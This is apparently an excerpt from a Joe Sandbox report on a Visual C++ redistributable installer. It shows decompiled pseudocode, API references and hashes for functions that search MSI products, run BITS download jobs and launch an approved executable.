                                                                          0x0002e5f6
                                                                          0x0002e600
                                                                          0x0002e60e
                                                                          0x0002e613
                                                                          0x00000000
                                                                          0x0002e5b8
                                                                          0x0002e5b8
                                                                          0x0002e6ec
                                                                          0x0002e6f4
                                                                          0x0002e702
                                                                          0x0002e702

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                          • String ID: @Met$Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                          • API String ID: 213125376-1135386840
                                                                          • Opcode ID: e81e2120738d6be9acacf192c2e08b6d2f47ea30bba3d6b04d49f0658ecb7ad4
                                                                          • Instruction ID: 044183950a48c36b870582ef33b5dc4b12a5019350c227e67fb9899d64324289
                                                                          • Opcode Fuzzy Hash: e81e2120738d6be9acacf192c2e08b6d2f47ea30bba3d6b04d49f0658ecb7ad4
                                                                          • Instruction Fuzzy Hash: C0417876A40364ABDB209BA5DC48ADBBFE9FF04751F104125F909EA190D735A940CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00019F2B Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 216COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 70%
                                                                          			E00019F2B(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				void* _v12;
				char _v16;
				intOrPtr _v24;
				intOrPtr _v36;
				void _v40;
				void* _t50;
				void* _t56;
				void* _t58;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t91;
				void* _t92;
				intOrPtr _t95;
				signed int _t97;
				intOrPtr _t100;
				intOrPtr _t101;
				char* _t107;
				void* _t108;
				void _t109;
				intOrPtr _t110;
				void* _t111;
				void* _t112;
				void* _t113;

				_t97 = 6;
				memset( &_v40, 0, _t97 << 2);
				_t113 = _t112 + 0xc;
				_t99 = _a4;
				_t95 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t104 =  *((intOrPtr*)(_a4 + 0x10));
				_t50 =  *((intOrPtr*)(_a4 + 0x10)) - 1;
				if(_t50 == 0) {
					_t107 = L"VersionString";
					L9:
					_t108 = E000171CF(_a8,  *((intOrPtr*)(_t99 + 0x18)),  &_v8, _t95);
					if(_t108 >= 0) {
						_t100 = 2;
						_v24 = _t100;
						if( *((intOrPtr*)(_a4 + 0x14)) != _t100) {
							L18:
							if(_t108 == 0x80070645) {
								L23:
								_push(_v8);
								_push("Product or related product not found: %ls");
								_t109 = 2;
								_push(_t109);
								E0005061A();
								_t101 = _a4;
								_t113 = _t113 + 0xc;
								_t56 =  *((intOrPtr*)(_t101 + 0x10)) - 1;
								if(_t56 == 0) {
									L26:
									asm("xorps xmm0, xmm0");
									asm("movlpd [ebp-0x24], xmm0");
									L27:
									_v24 = 1;
									L28:
									_t110 = _t95;
									L31:
									if(_t110 >= 0) {
										_t58 =  *((intOrPtr*)(_t101 + 0x10)) - 1;
										if(_t58 == 0) {
											_push(3);
											L40:
											_pop(_t95);
											L41:
											_t111 = E0002FEB7(_t104,  &_v40, _t95);
											if(_t111 >= 0) {
												_t111 = E00018137(_a8,  *((intOrPtr*)(_a4 + 4)),  &_v40);
												if(_t111 >= 0) {
													L47:
													E00012793(_v8);
													if(_v12 != 0) {
														E00012647(_v12, _v16);
													}
													E00030499( &_v40);
													return _t111;
												}
												_push("Failed to set variable.");
												L45:
												_push(_t111);
												E0005012F();
												L46:
												_push(_t111);
												E0005061A(2, "MsiProductSearch failed: ID \'%ls\', HRESULT 0x%x",  *_a4);
												goto L47;
											}
											_push("Failed to change value type.");
											goto L45;
										}
										_t72 = _t58 - 1;
										if(_t72 == 0) {
											_push(2);
											goto L40;
										}
										_t73 = _t72 - 1;
										if(_t73 == 0 || _t73 == 1) {
											_t95 = 1;
										}
										goto L41;
									}
									_push("Failed to get product info.");
									goto L45;
								}
								_t75 = _t56 - _t109;
								if(_t75 == 0) {
									_v40 = _t109;
									_v36 = _t95;
									goto L27;
								}
								if(_t75 != 1) {
									goto L28;
								}
								goto L26;
							}
							_t110 = E00052867(_t100, _v8, _t107,  &_v40);
							if(_t110 != 0x80070648) {
								L22:
								if(_t110 != 0x80070645) {
									L30:
									_t101 = _a4;
									goto L31;
								}
								goto L23;
							}
							_push(_v8);
							E0005061A(3, "Trying per-machine extended info for property \'%ls\' for product: %ls", _t107);
							_t113 = _t113 + 0x10;
							_t110 = E000528F8(_t100, _v8, _t95, 4, _t107,  &_v40);
							if(_t110 != 0x80070645) {
								goto L30;
							}
							_push(_v8);
							E0005061A(2, "Trying per-user extended info for property \'%ls\' for product: %ls", _t107);
							_t113 = _t113 + 0x10;
							_t110 = E000528F8(_t100, _v8, _t95, 2, _t107,  &_v40);
							goto L22;
						}
						_t111 = E0005255E(_t100, _t104, _v8,  &_v12,  &_v16, 1);
						if(_t111 >= 0) {
							if(_v16 != 1) {
								_t108 = 0x80070645;
								goto L18;
							}
							_t108 = E000122F9( &_v8,  *_v12, _t95);
							if(_t108 >= 0) {
								goto L18;
							}
							_push("Failed to copy upgrade code.");
							goto L45;
						}
						_push("Failed to enumerate related products for upgrade code.");
						goto L45;
					}
					_push("Failed to format GUID string.");
					goto L45;
				}
				_t91 = _t50 - 1;
				if(_t91 == 0) {
					_t107 = L"Language";
					goto L9;
				}
				_t92 = _t91 - 1;
				if(_t92 == 0) {
					_t107 = L"State";
					goto L9;
				}
				if(_t92 == 1) {
					_t107 = L"AssignmentType";
					goto L9;
				}
				_t111 = 0x80004001;
				E0005012F(0x80004001, "Unsupported product search type: %u", _t104);
				_t113 = _t113 + 0xc;
				goto L46;
			}




























                                                                          0x00019f3b
                                                                          0x00019f3c
                                                                          0x00019f3c
                                                                          0x00019f3e
                                                                          0x00019f41
                                                                          0x00019f43
                                                                          0x00019f46
                                                                          0x00019f49
                                                                          0x00019f4c
                                                                          0x00019f51
                                                                          0x00019f54
                                                                          0x00019f93
                                                                          0x00019f98
                                                                          0x00019fa8
                                                                          0x00019fac
                                                                          0x00019fbd
                                                                          0x00019fbe
                                                                          0x00019fc4
                                                                          0x0001a012
                                                                          0x0001a018
                                                                          0x0001a08b
                                                                          0x0001a08b
                                                                          0x0001a08e
                                                                          0x0001a095
                                                                          0x0001a096
                                                                          0x0001a097
                                                                          0x0001a09c
                                                                          0x0001a09f
                                                                          0x0001a0a5
                                                                          0x0001a0a8
                                                                          0x0001a0b3
                                                                          0x0001a0b3
                                                                          0x0001a0b6
                                                                          0x0001a0bb
                                                                          0x0001a0bb
                                                                          0x0001a0c2
                                                                          0x0001a0c2
                                                                          0x0001a0d1
                                                                          0x0001a0d3
                                                                          0x0001a0df
                                                                          0x0001a0e2
                                                                          0x0001a0fc
                                                                          0x0001a0fe
                                                                          0x0001a0fe
                                                                          0x0001a0ff
                                                                          0x0001a109
                                                                          0x0001a10d
                                                                          0x0001a128
                                                                          0x0001a12c
                                                                          0x0001a150
                                                                          0x0001a153
                                                                          0x0001a15c
                                                                          0x0001a164
                                                                          0x0001a164
                                                                          0x0001a16d
                                                                          0x0001a17a
                                                                          0x0001a17a
                                                                          0x0001a12e
                                                                          0x0001a133
                                                                          0x0001a133
                                                                          0x0001a134
                                                                          0x0001a13b
                                                                          0x0001a13e
                                                                          0x0001a148
                                                                          0x00000000
                                                                          0x0001a14d
                                                                          0x0001a10f
                                                                          0x00000000
                                                                          0x0001a10f
                                                                          0x0001a0e4
                                                                          0x0001a0e7
                                                                          0x0001a0f8
                                                                          0x00000000
                                                                          0x0001a0f8
                                                                          0x0001a0e9
                                                                          0x0001a0ec
                                                                          0x0001a0f5
                                                                          0x0001a0f5
                                                                          0x00000000
                                                                          0x0001a0ec
                                                                          0x0001a0d5
                                                                          0x00000000
                                                                          0x0001a0d5
                                                                          0x0001a0aa
                                                                          0x0001a0ac
                                                                          0x0001a0c6
                                                                          0x0001a0c9
                                                                          0x00000000
                                                                          0x0001a0c9
                                                                          0x0001a0b1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001a0b1
                                                                          0x0001a027
                                                                          0x0001a02f
                                                                          0x0001a083
                                                                          0x0001a089
                                                                          0x0001a0ce
                                                                          0x0001a0ce
                                                                          0x00000000
                                                                          0x0001a0ce
                                                                          0x00000000
                                                                          0x0001a089
                                                                          0x0001a031
                                                                          0x0001a03c
                                                                          0x0001a041
                                                                          0x0001a054
                                                                          0x0001a05c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001a05e
                                                                          0x0001a069
                                                                          0x0001a06e
                                                                          0x0001a081
                                                                          0x00000000
                                                                          0x0001a081
                                                                          0x00019fd8
                                                                          0x00019fdc
                                                                          0x00019fec
                                                                          0x0001a00d
                                                                          0x00000000
                                                                          0x0001a00d
                                                                          0x00019ffd
                                                                          0x0001a001
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001a003
                                                                          0x00000000
                                                                          0x0001a003
                                                                          0x00019fde
                                                                          0x00000000
                                                                          0x00019fde
                                                                          0x00019fae
                                                                          0x00000000
                                                                          0x00019fae
                                                                          0x00019f56
                                                                          0x00019f59
                                                                          0x00019f8c
                                                                          0x00000000
                                                                          0x00019f8c
                                                                          0x00019f5b
                                                                          0x00019f5e
                                                                          0x00019f85
                                                                          0x00000000
                                                                          0x00019f85
                                                                          0x00019f63
                                                                          0x00019f7e
                                                                          0x00000000
                                                                          0x00019f7e
                                                                          0x00019f66
                                                                          0x00019f71
                                                                          0x00019f76
                                                                          0x00000000

                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 00019FA3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open@16
                                                                          • String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
                                                                          • API String ID: 3613110473-2134270738
                                                                          • Opcode ID: a9f2f54cc130f87f43e85883676feb2ee02aa46dc520acd433d3493247d67792
                                                                          • Instruction ID: 81119843353a61db2f64cb6aee613d78590bf86d2b8e056445f89b3d4531c70a
                                                                          • Opcode Fuzzy Hash: a9f2f54cc130f87f43e85883676feb2ee02aa46dc520acd433d3493247d67792
                                                                          • Instruction Fuzzy Hash: 5D61F732E41118BBCF269EA8CD45DEF7BB9EB4A311F100165F904BB251C632DF859792
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003DC0D Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 204stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 66%
                                                                          			E0003DC0D(void* __edx, intOrPtr _a4, WCHAR** _a8, intOrPtr _a12) {
				void* _v8;
				WCHAR** _v12;
				WCHAR** _v16;
				void* __esi;
				WCHAR** _t51;
				WCHAR** _t53;
				WCHAR** _t56;
				WCHAR** _t83;
				short _t84;
				short _t85;
				short _t86;
				void* _t95;
				WCHAR** _t97;
				WCHAR** _t99;
				WCHAR** _t102;
				WCHAR** _t103;

				_t95 = __edx;
				_t96 = _a8;
				_v8 = 0;
				_t83 = 0;
				_v16 = 0;
				_v12 = 0;
				if(lstrlenW( *_a8) >= 8) {
					_t99 = E000121A5( &_v8,  *_t96, 0);
					__eflags = _t99;
					if(_t99 >= 0) {
						_t84 = 0x68;
						 *_v8 = _t84;
						_t85 = 0x74;
						 *((short*)(_v8 + 2)) = _t85;
						 *((short*)(_v8 + 4)) = _t85;
						_t86 = 0x70;
						 *((short*)(_v8 + 6)) = _t86;
						_t51 = E0003D677(_t95,  &_v16);
						_t97 = _v16;
						__eflags = _t51;
						if(_t51 >= 0) {
							_t53 = E0003DAC1(_t97, _a8[1], _a8[2]);
							__eflags = _t53;
							if(_t53 >= 0) {
								_t102 = ( *_t97)[8](_t97, _v8, _a12);
								_a8 = _t102;
								__eflags = _t102;
								if(__eflags >= 0) {
									_t56 = E0003E0B4(_t86, _t95, __eflags, 0x30);
									__eflags = _t56;
									if(_t56 == 0) {
										_t83 = 0;
										__eflags = 0;
									} else {
										_t56 = E0003D5AF(_t56, _a4,  &_a8);
										_t102 = _a8;
										_t83 = _t56;
									}
									__eflags = _t83;
									if(_t83 != 0) {
										__eflags = _t102;
										if(_t102 >= 0) {
											_t103 = ( *_t97)[0x32](_t97, _t83);
											__eflags = _t103;
											if(_t103 >= 0) {
												while(1) {
													_v12 = 0;
													_t83[9] = 0;
													_t83[8] = 0;
													ResetEvent(_t83[0xa]);
													_t103 = ( *_t97)[0xe](_t97);
													__eflags = _t103;
													if(_t103 < 0) {
														break;
													}
													_t90 = _t83;
													_t103 = E0003DB67(_t83, _t97);
													__eflags = _t103;
													if(_t103 < 0) {
														_push("Failed while waiting for BITS download.");
														goto L31;
													}
													_t103 = _t83[9];
													__eflags = _t103 - 0x80070642;
													if(_t103 == 0x80070642) {
														goto L32;
													}
													__eflags = _t103;
													if(_t103 < 0) {
														E0003D955(_t90, _t103, _a4, _t97, _t103, _t83[8],  &_v12);
													}
													__eflags = _v12;
													if(_v12 != 0) {
														continue;
													} else {
														__eflags = _t103;
														if(_t103 >= 0) {
															_t103 = ( *_t97)[0x12](_t97);
															__eflags = _t103;
															if(_t103 >= 0) {
																goto L32;
															}
															_push("Failed to complete BITS job.");
															goto L31;
														}
														_push("Failed to download BITS job.");
														goto L31;
													}
												}
												_push("Falied to start BITS job.");
												goto L31;
											}
											_push("Failed to set callback interface for BITS job.");
											goto L31;
										}
										_push("Failed to initialize BITS job callback.");
										goto L31;
									} else {
										_t103 = 0x8007000e;
										E000137D3(_t56, "bitsengine.cpp", 0x163, 0x8007000e);
										_push("Failed to create BITS job callback.");
										L31:
										_push(_t103);
										E0005012F();
										L32:
										__eflags = _t97;
										if(_t97 != 0) {
											( *_t97)[0x32](_t97, 0);
											__eflags = _t103;
											if(_t103 < 0) {
												( *_t97)[0x10](_t97);
											}
										}
										__eflags = _t83;
										if(_t83 != 0) {
											( *_t83)[4](_t83);
										}
										__eflags = _t97;
										if(_t97 != 0) {
											( *_t97)[4](_t97);
										}
										goto L39;
									}
								}
								_push("Failed to add file to BITS job.");
								goto L31;
							}
							_push("Failed to set credentials for BITS job.");
							goto L31;
						}
						_push("Failed to create BITS job.");
						goto L31;
					}
					_push("Failed to copy download URL.");
					_push(_t99);
					E0005012F();
					goto L39;
				} else {
					_t103 = 0x80070057;
					E000137D3(_t43, "bitsengine.cpp", 0x14b, 0x80070057);
					E0005012F(0x80070057, "Invalid BITS engine URL: %ls",  *_t96);
					L39:
					if(_v8 != 0) {
						E000554EF(_v8);
					}
					return _t103;
				}
			}



















                                                                          0x0003dc0d
                                                                          0x0003dc16
                                                                          0x0003dc1b
                                                                          0x0003dc1e
                                                                          0x0003dc20
                                                                          0x0003dc23
                                                                          0x0003dc31
                                                                          0x0003dc69
                                                                          0x0003dc6b
                                                                          0x0003dc6d
                                                                          0x0003dc86
                                                                          0x0003dc89
                                                                          0x0003dc8f
                                                                          0x0003dc92
                                                                          0x0003dc99
                                                                          0x0003dca0
                                                                          0x0003dca1
                                                                          0x0003dca9
                                                                          0x0003dcae
                                                                          0x0003dcb3
                                                                          0x0003dcb5
                                                                          0x0003dccb
                                                                          0x0003dcd2
                                                                          0x0003dcd4
                                                                          0x0003dcec
                                                                          0x0003dcee
                                                                          0x0003dcf1
                                                                          0x0003dcf3
                                                                          0x0003dd01
                                                                          0x0003dd07
                                                                          0x0003dd09
                                                                          0x0003dd20
                                                                          0x0003dd20
                                                                          0x0003dd0b
                                                                          0x0003dd14
                                                                          0x0003dd19
                                                                          0x0003dd1c
                                                                          0x0003dd1c
                                                                          0x0003dd22
                                                                          0x0003dd24
                                                                          0x0003dd45
                                                                          0x0003dd47
                                                                          0x0003dd5a
                                                                          0x0003dd5c
                                                                          0x0003dd5e
                                                                          0x0003dd67
                                                                          0x0003dd69
                                                                          0x0003dd6f
                                                                          0x0003dd72
                                                                          0x0003dd75
                                                                          0x0003dd81
                                                                          0x0003dd83
                                                                          0x0003dd85
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003dd88
                                                                          0x0003dd8f
                                                                          0x0003dd91
                                                                          0x0003dd93
                                                                          0x0003ddd9
                                                                          0x00000000
                                                                          0x0003ddd9
                                                                          0x0003dd95
                                                                          0x0003dd98
                                                                          0x0003dd9e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003dda0
                                                                          0x0003dda2
                                                                          0x0003ddb0
                                                                          0x0003ddb0
                                                                          0x0003ddb5
                                                                          0x0003ddb9
                                                                          0x00000000
                                                                          0x0003ddbb
                                                                          0x0003ddbb
                                                                          0x0003ddbd
                                                                          0x0003ddcc
                                                                          0x0003ddce
                                                                          0x0003ddd0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0003ddd2
                                                                          0x00000000
                                                                          0x0003ddd2
                                                                          0x0003ddbf
                                                                          0x00000000
                                                                          0x0003ddbf
                                                                          0x0003ddb9
                                                                          0x0003dde0
                                                                          0x00000000
                                                                          0x0003dde0
                                                                          0x0003dd60
                                                                          0x00000000
                                                                          0x0003dd60
                                                                          0x0003dd49
                                                                          0x00000000
                                                                          0x0003dd26
                                                                          0x0003dd26
                                                                          0x0003dd36
                                                                          0x0003dd3b
                                                                          0x0003dde5
                                                                          0x0003dde5
                                                                          0x0003dde6
                                                                          0x0003dded
                                                                          0x0003dded
                                                                          0x0003ddef
                                                                          0x0003ddf6
                                                                          0x0003ddf9
                                                                          0x0003ddfb
                                                                          0x0003de00
                                                                          0x0003de00
                                                                          0x0003ddfb
                                                                          0x0003de03
                                                                          0x0003de05
                                                                          0x0003de0a
                                                                          0x0003de0a
                                                                          0x0003de0d
                                                                          0x0003de0f
                                                                          0x0003de14
                                                                          0x0003de14
                                                                          0x00000000
                                                                          0x0003de0f
                                                                          0x0003dd24
                                                                          0x0003dcf5
                                                                          0x00000000
                                                                          0x0003dcf5
                                                                          0x0003dcd6
                                                                          0x00000000
                                                                          0x0003dcd6
                                                                          0x0003dcb7
                                                                          0x00000000
                                                                          0x0003dcb7
                                                                          0x0003dc6f
                                                                          0x0003dc74
                                                                          0x0003dc75
                                                                          0x00000000
                                                                          0x0003dc33
                                                                          0x0003dc33
                                                                          0x0003dc43
                                                                          0x0003dc50
                                                                          0x0003de17
                                                                          0x0003de1b
                                                                          0x0003de20
                                                                          0x0003de20
                                                                          0x0003de2d
                                                                          0x0003de2d

                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,?,00039751,75C08550,?,?,00000000,?,?,?,00000001,00000000,?), ref: 0003DC28
                                                                          Strings
                                                                          • Failed to set callback interface for BITS job., xrefs: 0003DD60
                                                                          • Failed to complete BITS job., xrefs: 0003DDD2
                                                                          • Failed to set credentials for BITS job., xrefs: 0003DCD6
                                                                          • Failed while waiting for BITS download., xrefs: 0003DDD9
                                                                          • Failed to create BITS job callback., xrefs: 0003DD3B
                                                                          • Failed to download BITS job., xrefs: 0003DDBF
                                                                          • bitsuser.cpp, xrefs: 0003DC3E, 0003DD31
                                                                          • Failed to create BITS job., xrefs: 0003DCB7
                                                                          • Failed to add file to BITS job., xrefs: 0003DCF5
                                                                          • Falied to start BITS job., xrefs: 0003DDE0
                                                                          • Failed to copy download URL., xrefs: 0003DC6F
                                                                          • Failed to initialize BITS job callback., xrefs: 0003DD49
                                                                          • Invalid BITS user URL: %ls, xrefs: 0003DC4A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen
                                                                          • String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS user URL: %ls$bitsuser.cpp
                                                                          • API String ID: 1659193697-2382896028
                                                                          • Opcode ID: e2f74afbce87c731f31e105ec4d4e5dff06767b1ebe5a64b0783dfe1fafca27a
                                                                          • Instruction ID: 404ba2b2ebc180dbe6746d98c7ca3fbfead71e850ab253e7f2c520416e101602
                                                                          • Opcode Fuzzy Hash: e2f74afbce87c731f31e105ec4d4e5dff06767b1ebe5a64b0783dfe1fafca27a
                                                                          • Instruction Fuzzy Hash: 95619131E00225EBCB239F94E885EAE7BB8AF04B50F118256FD08AF251E775DD00DB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001BB30 Relevance: 28.2, APIs: 6, Strings: 10, Instructions: 189processCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 73%
                                                                          			E0001BB30(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				char _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				char _v24;
				struct _PROCESS_INFORMATION _v40;
				struct _STARTUPINFOW _v108;
				void* __edi;
				intOrPtr* _t60;
				void* _t73;
				signed short _t82;
				void* _t98;
				intOrPtr _t100;
				void* _t102;

				_v24 = 0;
				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				E0003F670(_t98,  &_v108, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t100 = _a8;
				_t60 =  *((intOrPtr*)(_t100 + 0xc));
				if(_t60 == 0 ||  *_t60 == 0) {
					_t102 = E00011F20( &_v20, L"\"%ls\"",  *(_t100 + 8));
					if(_t102 < 0) {
						goto L6;
					}
					_t73 = E00011F20( &_v12, L"\"%ls\"",  *(_t100 + 8));
					goto L12;
				} else {
					_t94 =  &_v24;
					_t102 = E000171CF(_a4, _t60,  &_v24, 0);
					if(_t102 >= 0) {
						_push(_v24);
						_t102 = E00011F62( &_v20, L"\"%ls\" %s",  *(_t100 + 8));
						if(_t102 >= 0) {
							_t102 = E000171E9(_a4,  *((intOrPtr*)(_t100 + 0xc)),  &_v16, 0);
							if(_t102 >= 0) {
								_push(_v16);
								_t73 = E00011F20( &_v12, L"\"%ls\" %s",  *(_t100 + 8));
								L12:
								_t102 = _t73;
								if(_t102 >= 0) {
									_t102 = E00013446(_t94,  *(_t100 + 8),  &_v8);
									if(_t102 < 0 && _v8 != 0) {
										E000554EF(_v8);
										_v8 = 0;
									}
									_push(_v12);
									E0001550F(2, 0x2000025a,  *(_t100 + 8));
									_v108.cb = 0x44;
									if(CreateProcessW( *(_t100 + 8), _v20, 0, 0, 0, 0x200, 0, _v8,  &_v108,  &_v40) != 0) {
										 *_a12 = _v40.dwProcessId;
										if( *(_t100 + 0x10) != 0) {
											WaitForInputIdle(_v40.hProcess,  *(_t100 + 0x10));
										}
									} else {
										_t82 = GetLastError();
										_t105 =  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
										_t102 =  >=  ? 0x80004005 :  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
										E000137D3(0x80004005, "approvedexe.cpp", 0xbe, _t102);
										E0005012F(_t102, "Failed to CreateProcess on path: %ls",  *(_t100 + 8));
									}
									goto L21;
								}
								_push("Failed to create obfuscated executable command.");
								goto L4;
							}
							_push("Failed to format obfuscated argument string.");
							goto L4;
						}
						L6:
						_push("Failed to create executable command.");
						goto L4;
					} else {
						_push("Failed to format argument string.");
						L4:
						_push(_t102);
						E0005012F();
						L21:
						E00012793(_v24);
						if(_v16 != 0) {
							E000554EF(_v16);
						}
						E00012793(_v20);
						if(_v12 != 0) {
							E000554EF(_v12);
						}
						if(_v8 != 0) {
							E000554EF(_v8);
						}
						if(_v40.hThread != 0) {
							CloseHandle(_v40.hThread);
							_v40.hThread = 0;
						}
						if(_v40.hProcess != 0) {
							CloseHandle(_v40);
						}
						return _t102;
					}
				}
			}

















                                                                          0x0001bb42
                                                                          0x0001bb45
                                                                          0x0001bb48
                                                                          0x0001bb4b
                                                                          0x0001bb4e
                                                                          0x0001bb51
                                                                          0x0001bb5b
                                                                          0x0001bb5f
                                                                          0x0001bb60
                                                                          0x0001bb61
                                                                          0x0001bb62
                                                                          0x0001bb65
                                                                          0x0001bb6a
                                                                          0x0001bc0a
                                                                          0x0001bc11
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001bc1f
                                                                          0x00000000
                                                                          0x0001bb79
                                                                          0x0001bb7a
                                                                          0x0001bb87
                                                                          0x0001bb8b
                                                                          0x0001bb9f
                                                                          0x0001bbb3
                                                                          0x0001bbba
                                                                          0x0001bbd3
                                                                          0x0001bbd7
                                                                          0x0001bbe0
                                                                          0x0001bbef
                                                                          0x0001bc27
                                                                          0x0001bc27
                                                                          0x0001bc2b
                                                                          0x0001bc43
                                                                          0x0001bc47
                                                                          0x0001bc51
                                                                          0x0001bc56
                                                                          0x0001bc56
                                                                          0x0001bc59
                                                                          0x0001bc66
                                                                          0x0001bc6e
                                                                          0x0001bc97
                                                                          0x0001bce0
                                                                          0x0001bce5
                                                                          0x0001bced
                                                                          0x0001bced
                                                                          0x0001bc99
                                                                          0x0001bc99
                                                                          0x0001bcaa
                                                                          0x0001bcb4
                                                                          0x0001bcc2
                                                                          0x0001bcd0
                                                                          0x0001bcd5
                                                                          0x00000000
                                                                          0x0001bc97
                                                                          0x0001bc2d
                                                                          0x00000000
                                                                          0x0001bc2d
                                                                          0x0001bbd9
                                                                          0x00000000
                                                                          0x0001bbd9
                                                                          0x0001bbbc
                                                                          0x0001bbbc
                                                                          0x00000000
                                                                          0x0001bb8d
                                                                          0x0001bb8d
                                                                          0x0001bb92
                                                                          0x0001bb92
                                                                          0x0001bb93
                                                                          0x0001bcf3
                                                                          0x0001bcf6
                                                                          0x0001bcfe
                                                                          0x0001bd03
                                                                          0x0001bd03
                                                                          0x0001bd0b
                                                                          0x0001bd13
                                                                          0x0001bd18
                                                                          0x0001bd18
                                                                          0x0001bd20
                                                                          0x0001bd25
                                                                          0x0001bd25
                                                                          0x0001bd33
                                                                          0x0001bd38
                                                                          0x0001bd3a
                                                                          0x0001bd3a
                                                                          0x0001bd40
                                                                          0x0001bd45
                                                                          0x0001bd45
                                                                          0x0001bd4f
                                                                          0x0001bd4f
                                                                          0x0001bb8b

                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 0001BB82
                                                                          • CreateProcessW.KERNEL32 ref: 0001BC8F
                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0001BC99
                                                                          • WaitForInputIdle.USER32 ref: 0001BCED
                                                                          • CloseHandle.KERNEL32(?,?,?), ref: 0001BD38
                                                                          • CloseHandle.KERNEL32(?,?,?), ref: 0001BD45
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
